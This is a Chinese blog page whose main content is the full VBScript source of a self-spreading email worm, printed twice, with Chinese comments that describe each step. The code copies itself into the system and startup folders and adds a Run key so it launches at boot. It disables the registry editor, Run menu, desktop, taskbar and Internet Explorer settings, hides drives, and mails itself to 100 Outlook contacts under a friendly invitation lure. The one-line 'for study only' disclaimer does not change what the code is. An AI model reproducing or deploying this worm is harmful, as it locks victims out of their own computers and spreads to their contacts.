hereson
- 浏览: 1460908 次
- 性别:
- 来自: 苏州
-
文章分类
- 全部博客 (564)
- 算法 (7)
- 流金岁月 (1)
- Javascript (30)
- actionscript (108)
- as3.0 game (14)
- flex (84)
- fms2 (27)
- 正则表达式 (7)
- 开源组件代码(as3.0) (1)
- Pv3d (13)
- Cairngorm (4)
- vbs (54)
- VB程序设计 (26)
- 计算机应用与维护 (4)
- 职场实用穿衣技巧 (3)
- 历史风云 (15)
- 淡泊明志,宁静致远 (12)
- 情感 (26)
- 杂谈 (41)
- 越南风 (14)
- DirectX (9)
- Dev-cpp (11)
- 回望百年 (2)
- 建站经验 (2)
- Python (24)
- 网络赚钱 (4)
- php (2)
- html (1)
- ob0短址网 (1)
- ob0.cn (1)
- wordpress (1)
- pandas logistic (1)
- haxe (1)
- opencv (1)
- 微信小程序 (3)
- vue (3)
- Flutter (1)
最新评论
-
GGGGeek:
第一个函数滚动监听不起作用,onPageScroll可以
微信小程序--搜索框滚动到顶部时悬浮 -
naomibyron:
解决办法:工具 -> 编译选项 -> 编译器 ...
dev-c++中编译含WINSOCK的代码出现错误的解决方法 -
haichuan11:
这个…… 代码不全真的是让人很憋屈的感觉啊
actionScript 3.0 图片裁剪及旋转 -
chenyw101:
老兄能留个QQ号吗?具体的我有些东西想请教下你
用VB制作网站登陆器 -
yantao1943:
貌似有点问题,只派发一次事件啊
使用ActionScript 2.0或ActionScript 3.0处理音频文件的提示点(cue
此代码会被卡巴斯基杀掉,对于安装卡巴的电脑没有危害,此代码只供参考学习之用,请勿使用在不正当地方。
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Start MenuPrograms启动Win32system.vbs")
//分别复制病毒到windows/winnt,system/system32,启动菜单下
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD" //禁止“运行”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,"REG_DWORD" //禁止“关闭系统”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives",63000000,"REG_DWORD" //隐藏盘符
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools",1,"REG_DWORD" //禁止使用注册表编辑器
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunScanRegistry","" //禁止注册表扫描
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff",1,"REG_DWORD" //禁止“注销”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode",1,"REG_DWORD" //禁止进入MS-DOS实模式
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32system","Win32system.vbs" // 运行这个病毒拉(开机自动运行)
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop",1,"REG_DWORD" //禁止显示桌面所有图标(就是桌面上什么都没拉,只看见蓝天^_^)
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled",1,"REG_DWORD" //这个大概是禁止进入MS-DOS模式拉
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetTaskBar",1,"REG_DWORD" //禁止任务栏和开始菜单了
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu",1,"REG_DWORD" //禁止鼠标右键
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetFolders",1,"REG_DWORD" //禁止控制面板
r.Regwrite "HKLMSoftwareCLASSES.reg","txtfile" //禁止使用REG文件
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption","nihaoa " //这个就是开机提示的标题了
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText","nihaoa aa a aa a " //开机提示的内容
Set ol=CreateObject("Outlook.Application") //这个是开始发信了(病毒要传播嘛)
On Error Resume Next
For x=1 To 100 //很明显,是给你的100个好友发信,这个值你可以自定义拉
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="还在忙吗?" //信的标题
Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 来自Rose的问候!" //信的内容
Mail.Attachments.Add(dir2&"Win32system.vbs") //当他打开信后(当然是附件),这个就进驻他的磁盘了!!!害怕吧
Mail.Send
Next
ol.Quit
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu",1,"REG_DWORD" //IE的右键被禁用拉
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions",1,"REG_DWORD" //Internet选项也禁用拉
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserSaveAs",1,"REG_DWORD" // 想“另存为”,没门!!!
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFileOpen",1,"REG_DWORD" // 禁用“文件打开”
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAdvanced",1,"REG_DWORD" // 禁止更改高级设置
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelCache Internet",1,"REG_DWORD" // 临时文件设置也被禁止更改哦
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAutoConfig",1,"REG_DWORD" // “自动配置”禁止更改
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD" // 想更改你的主页,算了吧!
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHistory",1,"REG_DWORD" // “历史记录设置”也不能更改了
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelConnwiz Admin Lock",1,"REG_DWORD" // “Internet连接向导”
r.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.baidu.com" // 这是设置的默认首页
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelSecurityTab",1,"REG_DWORD" // 禁止安全项,
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelResetWebSettings",1,"REG_DWORD" // 禁止“重置web设置”
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource",1,"REG_DWORD" // 查看源文件也不行,太毒了吧!~
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerInfodeliveryRestrictionsNoAddingSubScriptions",1,"REG_DWORD" // 添加脱机页计划 禁用
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu",1,"REG_DWORD" // 禁止资源管理器中文件菜单(想打开文件也^_^不行)
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Start MenuPrograms启动Win32system.vbs")
//分别复制病毒到windows/winnt,system/system32,启动菜单下
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD" //禁止“运行”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,"REG_DWORD" //禁止“关闭系统”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives",63000000,"REG_DWORD" //隐藏盘符
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools",1,"REG_DWORD" //禁止使用注册表编辑器
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunScanRegistry","" //禁止注册表扫描
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff",1,"REG_DWORD" //禁止“注销”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode",1,"REG_DWORD" //禁止进入MS-DOS实模式
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32system","Win32system.vbs" // 运行这个病毒拉(开机自动运行)
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop",1,"REG_DWORD" //禁止显示桌面所有图标(就是桌面上什么都没拉,只看见蓝天^_^)
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled",1,"REG_DWORD" //这个大概是禁止进入MS-DOS模式拉
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetTaskBar",1,"REG_DWORD" //禁止任务栏和开始菜单了
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu",1,"REG_DWORD" //禁止鼠标右键
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetFolders",1,"REG_DWORD" //禁止控制面板
r.Regwrite "HKLMSoftwareCLASSES.reg","txtfile" //禁止使用REG文件
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption","nihaoa " //这个就是开机提示的标题了
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText","nihaoa aa a aa a " //开机提示的内容
Set ol=CreateObject("Outlook.Application") //这个是开始发信了(病毒要传播嘛)
On Error Resume Next
For x=1 To 100 //很明显,是给你的100个好友发信,这个值你可以自定义拉
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="还在忙吗?" //信的标题
Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 来自Rose的问候!" //信的内容
Mail.Attachments.Add(dir2&"Win32system.vbs") //当他打开信后(当然是附件),这个就进驻他的磁盘了!!!害怕吧
Mail.Send
Next
ol.Quit
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu",1,"REG_DWORD" //IE的右键被禁用拉
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions",1,"REG_DWORD" //Internet选项也禁用拉
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserSaveAs",1,"REG_DWORD" // 想“另存为”,没门!!!
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFileOpen",1,"REG_DWORD" // 禁用“文件打开”
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAdvanced",1,"REG_DWORD" // 禁止更改高级设置
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelCache Internet",1,"REG_DWORD" // 临时文件设置也被禁止更改哦
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAutoConfig",1,"REG_DWORD" // “自动配置”禁止更改
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD" // 想更改你的主页,算了吧!
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHistory",1,"REG_DWORD" // “历史记录设置”也不能更改了
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelConnwiz Admin Lock",1,"REG_DWORD" // “Internet连接向导”
r.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.baidu.com" // 这是设置的默认首页
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelSecurityTab",1,"REG_DWORD" // 禁止安全项,
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelResetWebSettings",1,"REG_DWORD" // 禁止“重置web设置”
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource",1,"REG_DWORD" // 查看源文件也不行,太毒了吧!~
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerInfodeliveryRestrictionsNoAddingSubScriptions",1,"REG_DWORD" // 添加脱机页计划 禁用
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu",1,"REG_DWORD" // 禁止资源管理器中文件菜单(想打开文件也^_^不行)
分享到:
发表评论
-
使用bat 处理文件 批量下载图片,下载文件
2018-11-17 10:42 3997Download Wscript.Arguments(0) ... -
VB6逆向工程浅析
2011-12-29 07:36 1762前言 VB的编译有两种方式,一种是P-Code ... -
VB函数——逆向分析备查
2011-12-28 21:39 1517Variant 变量的内部表示:_____________ ... -
VB程序逆向常用的函数
2011-12-28 21:38 14991) 数据类型转换: ... -
用XML创建可排序、分页的数据显示页面
2008-08-30 08:10 1413在Web开发中,我们经常 ... -
SQL注入天书 - ASP注入漏洞全接触
2008-08-28 17:39 1093随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员 ... -
一个学校的网站安全性测试
2008-08-28 17:38 1176本文作者:angel文章性质:原创发布日期:2004-04-0 ... -
改mdb为asp所带来的灾难
2008-08-28 17:36 1017本文作者:SuperHei·Lilo文章性质:原创发布日期: ... -
XML实例解析
2008-08-28 17:35 1121提纲: 一:实例效果 ... -
选单连动
2008-08-28 17:34 1079动机: 现在我们做个在IE里应用XML的一个小例子:解决双下 ... -
ASP常用的代码(不断更新)
2008-08-28 17:34 12511.获得系统时间:<%=now()%>2.取得来访 ... -
动态排序
2008-08-28 17:31 1144动机: 排序功能让我们页面上的数据显的更人性化,是我们在网站 ... -
动态查询
2008-08-28 17:31 887动机: 查询功能是我们 ... -
XML卷之动态分页
2008-08-28 17:30 1229动机: 为了方便用户查看大批量数据,我们会用到动态分页,因此 ... -
对xml+xsl实现分页排序的改进,使支持对所有数据进行排序
2008-08-28 17:29 2111以往见过的利用xml+xsl来实现分页排序的基本都只能本页内排 ... -
使用XML、XSLT和XPath创建可排序、分页、重用的数据显示页
2008-08-28 17:27 1344在Web开发中,我们经常 ... -
用ASP+XML编写留言本
2008-08-28 17:16 2878一、读者指引 读者 ... -
asp查询xml的代码,实现了无刷新、模糊查询功能
2008-08-28 17:13 1169<html> <head> ... -
用Asp+XmlHttp实现RssReader功能
2008-08-28 17:12 885<style>body {margin:10px; ... -
vb+Webbrowser控件详解
2008-08-25 20:48 6837vb+Webbrowser控件详解 1、获得浏览器信息: P ...
相关推荐
2. Windows Script Host支持:VBS病毒通过Windows Script Host执行脚本代码,这是Windows操作系统内置的一个组件,用于执行各种脚本语言,如VBS、JScript等。 3. Wscript.exe执行:VBS病毒依赖于Wscript.exe这个可...
1. **自我复制**:VBS病毒能复制自身到其他文件中,通常是通过修改文件的元数据或者直接在文件内容中插入恶意代码。 2. **传播**:病毒可以利用电子邮件、即时消息和网络共享来传播。 3. **破坏系统**:VBS病毒可能...
VBS病毒是一种利用VBScript脚本语言编写的恶意代码,它可能通过电子邮件、网络下载或其他感染途径潜入用户的计算机系统,对HTML文件进行篡改,植入恶意代码,影响系统的正常运行。 描述中提到的“修复被vbs病毒感染...
电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊...
### VBS蓝屏代码解析与安全警告 #### 一、VBS蓝屏代码概述 根据提供的文件信息,这里讨论的是一个使用Visual Basic Script (VBS)编写的脚本,其目的是触发系统的“蓝屏”(Blue Screen of Death, BSOD)。这种行为...
VBS蠕虫病毒分析研究及防护措施 只有有vbs代码段分析说明,文字描述,和预防vbs病毒措施
vbs整人 windows弹窗你是猪
VBS病毒专杀工具是一种专门针对VBScript (Visual Basic Script) 编写的恶意软件的清除程序。VBScript是一种脚本语言,广泛应用于Windows系统中,包括网页、hta(HTML应用程序)以及批处理脚本等。由于其易用性和灵活...
VBS病毒,全称Visual Basic Script Virus,是一种利用微软的Visual Basic Script编程语言编写的恶意代码,常通过电子邮件、网络共享、U盘等途径传播。这类病毒常常隐藏在快捷方式中,一旦用户点击,就会自动执行,对...
在IT领域,尤其是在网络安全方面,隐藏文件夹病毒和VBS病毒是常见的威胁。VBS(Visual Basic Script)是一种脚本语言,被恶意用户利用来创建病毒、木马等恶意程序。这种病毒通常会隐藏文件夹,使用户无法访问或删除...
VBS病毒,全称为Visual Basic Script(VB脚本)病毒,是一种基于Microsoft Visual Basic Script编程语言编写的恶意软件。这种病毒通常通过电子邮件、网络下载、U盘等途径传播,一旦感染,可能会对用户的计算机系统...
本病毒目前非常流行,不过很垃圾, 使用本软件可以彻底清除该病毒, 大家也可以手动杀毒, (本软件送给中南民大论坛的水花兄以及所有被该病毒骚扰的水友们,谢谢你们的支持!) 本病毒手动杀毒方法: 1.开机时按F8...
抖音爆火vbs表白代码,亲测可用,含if-else选择语句,do-loop循环语句,inputbox()输入函数,功能较多,仅需修改文字即可使用。
标题中的“Autorun.vbs病毒专杀工具.rar”表明这是一个针对特定病毒的解决方案,该病毒被称为Autorun.vbs。在Windows系统中,autorun.inf文件常被用来自动执行磁盘上的程序,而当这种功能被恶意利用时,就可能成为...
VBS 整人代码[归类] VBS 整人代码是指使用 Visual Basic Scripting (VBS) 语言编写的代码,以达到整人或恶作剧的目的。这些代码通常会在不知不觉中执行一些恶作剧的操作,例如发送垃圾信息、打开多个程序、删除文件...
支持多线程,支持指定修复,保留正常html,修复被vbs病毒感染的html文件,保留正常代码,删除例如"[removed]<!-- DropFileName = "svchost.exe""这样的病毒代码
这个名为“VBS代码合集(20060623-20090225).zip”的压缩包文件包含了从2006年6月23日至2009年2月25日期间的VBS代码示例和学习资料,是学习和理解VBS编程的一个宝贵资源。 VBS的核心概念包括: 1. 变量与数据类型...
vbs表白代码,欢迎使用 部分代码: '声明变量 Dim txt, mypath, sentences '第一步,获取当前的文件路径 '解决了手动改名的问题 mypath = CreateObject("WScript.Shell").CurrentDirectory
VBS文件夹病毒是一种利用VBScript编程语言编写的恶意软件,它们通常隐藏在电子邮件、可移动存储设备或网络下载中,一旦激活,就会对用户的计算机系统造成严重破坏。这种病毒的特点是自我复制,并可能感染系统中的...
在上述的“VBS整人代码大全”中,我们看到VBS被用于编写恶作剧性质的小程序,这些小程序通过消息框(MsgBox)和系统命令来捉弄用户。 1. **创建消息框**: MsgBox函数是VBS中用于显示对话框的内置函数,通常用来向...